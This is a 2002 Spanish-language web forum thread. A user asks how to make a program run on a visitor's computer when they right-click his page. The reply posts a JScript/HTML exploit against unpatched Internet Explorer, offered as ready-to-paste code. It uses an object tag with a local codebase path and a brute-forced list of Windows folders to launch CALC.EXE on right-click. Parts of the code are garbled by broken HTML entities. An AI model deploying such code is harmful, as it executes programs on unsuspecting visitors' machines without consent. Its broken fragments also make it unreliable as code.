Foros del Web » Programando para Internet » Javascript »

Sobre el boton derecho del mouse

Estas en el tema de Sobre el boton derecho del mouse en el foro de Javascript en Foros del Web. Por favor kisiera saber si kuando pinchan en el boton derecho del mouse en mi pagina se puede hacer k se ejecute algun programa...
  #1 (permalink)  
Antiguo 27/04/2002, 05:09
 
Fecha de Ingreso: abril-2002
Mensajes: 39
Antigüedad: 22 años
Puntos: 0
Sobre el boton derecho del mouse

Por favor kisiera saber si kuando pinchan en el boton derecho del mouse en mi pagina se puede hacer k se ejecute algun programa
  #2 (permalink)  
Antiguo 28/04/2002, 14:25
Avatar de eloi  
Fecha de Ingreso: marzo-2002
Mensajes: 149
Antigüedad: 22 años, 1 mes
Puntos: 0
Re: Sobre el boton derecho del mouse

Pues si el navegador no lleva el parche cumultativo de seguridad si se puede.
Usa esto:

<!-- Este código y mas en http://www.webpersonal.net/elosan -->
<input style="visibility:hidden" id="barra" value="\"><span id="oSpan"></span><script language="jscript" defer>u = "c:"; p ="CALC.EXE"; function ejecutar(e){ oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="'+e+'" style="visibility:hidden; position:absolute"></object>';}</script><script>win ="desconocido"; carpetas = new Array("windows","win95"," win98","winnt","win98se", "winxp","minme","windows9 5","windows98","windowsnt&quot ;,"windows98se","windowsme",&q uot;windowsxp","mswin95","mswi n98","mswinxp","mswin98se&quot ;,"mswinnt","mswinme","wi n2000","windows2000","mswin200 0","win00","windows00",&q uot;mswin00","win2k","windows2 k","mswin2k"); for(i in carpetas){ document.write('<img style="position:absolute; visibility:hidden" src="file:///C:/'+carpetas[I]+'/winlogo.gif">')}</script><body oncontextmenu="ejecutar(u + barra.value + "'+carpetas+'" + barra.value + p)" onmousemove="sist.value = win">

Este ejemplo ejecuta la calculadora


<hr size="1"><font face="Verdana">[B]¿Buscas algun código?<br><input id="q"> <input type="submit" value="Buscar" onclick="document.location = &quot;http://www.webpersonal.net/elosan/indicecods.htm?info=enter,todos,&quot;+q.value+&qu ot;,0&quot;">
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 17:44.